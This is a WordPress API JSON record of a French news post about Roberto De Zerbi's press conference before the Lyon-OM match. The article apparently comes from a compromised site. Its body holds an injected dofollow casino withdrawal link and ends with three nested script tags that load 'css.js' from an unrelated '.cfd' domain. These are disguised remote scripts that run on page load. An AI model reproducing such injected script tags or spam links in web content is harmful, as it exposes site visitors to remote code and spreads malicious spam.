{"id":4009,"date":"2025-11-20T03:56:56","date_gmt":"2025-11-20T03:56:56","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=4009"},"modified":"2026-02-02T22:10:17","modified_gmt":"2026-02-02T22:10:17","slug":"a-quelle-heure-la-conference-de-presse-avant-lyon-om","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/a-quelle-heure-la-conference-de-presse-avant-lyon-om\/","title":{"rendered":"\u00c0 quelle heure la conf\u00e9rence de presse avant Lyon-OM ?"},"content":{"rendered":"<h1>\u00c0 quelle heure la conf\u00e9rence de presse avant Lyon-OM ?<\/h1>\n<p>\u00c0 deux jours du choc de la 3e journ\u00e9e de Ligue 1 McDonald\u2019s entre Lyon et l\u2019Olympique de Marseille, <strong>Roberto De Zerbi<\/strong> prendra la parole demain, vendredi 29 ao\u00fbt, en conf\u00e9rence de presse. Le rendez-vous est fix\u00e9 \u00e0 14h30 au centre d\u2019entra\u00eenement Robert Louis-Dreyfus.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-barriere-fr.com\/casino-barriere-retraits\/\" target=\"_blank\" rel=\"dofollow\">casino barriere Retraits<\/a><\/strong> &#8211; Le montant minimum de retrait est g\u00e9n\u00e9ralement de 20\u20ac, mais cela peut varier en fonction de la m\u00e9thode de retrait choisie.<\/p><\/blockquote>\n<p>Aux c\u00f4t\u00e9s de l\u2019entra\u00eeneur italien, un joueur olympien participera \u00e9galement \u00e0 cet \u00e9change avec les journalistes. L\u2019identit\u00e9 de ce dernier n\u2019a pas encore \u00e9t\u00e9 communiqu\u00e9e par le club. Comme \u00e0 l\u2019accoutum\u00e9e, la conf\u00e9rence permettra d\u2019\u00e9voquer les enjeux de cette rencontre particuli\u00e8re face \u00e0 Lyon, ainsi que l\u2019\u00e9tat de forme de l\u2019effectif marseillais.<\/p>\n<p>Les m\u00e9dias accr\u00e9dit\u00e9s auront \u00e9galement l\u2019opportunit\u00e9 d\u2019assister aux 15 premi\u00e8res minutes de l\u2019entra\u00eenement programm\u00e9 \u00e0 11h30, avant de retrouver De Zerbi et son joueur pour le point presse. Nous vous ferons donc vivre ces quinze minutes en direct dans l&#x27;OM au caf\u00e9, pr\u00e9sent\u00e9 par <strong>Slim Hanayen<\/strong>, et en duplex de la Commanderie avec <strong>Romain Canuti<\/strong>.<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00c0 quelle heure la conf\u00e9rence de presse avant Lyon-OM ? \u00c0 deux jours du choc de la 3e journ\u00e9e de Ligue 1 McDonald\u2019s entre Lyon et l\u2019Olympique de Marseille, Roberto&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-4009","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4009","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=4009"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4009\/revisions"}],"predecessor-version":[{"id":14860,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4009\/revisions\/14860"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=4009"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=4009"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=4009"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}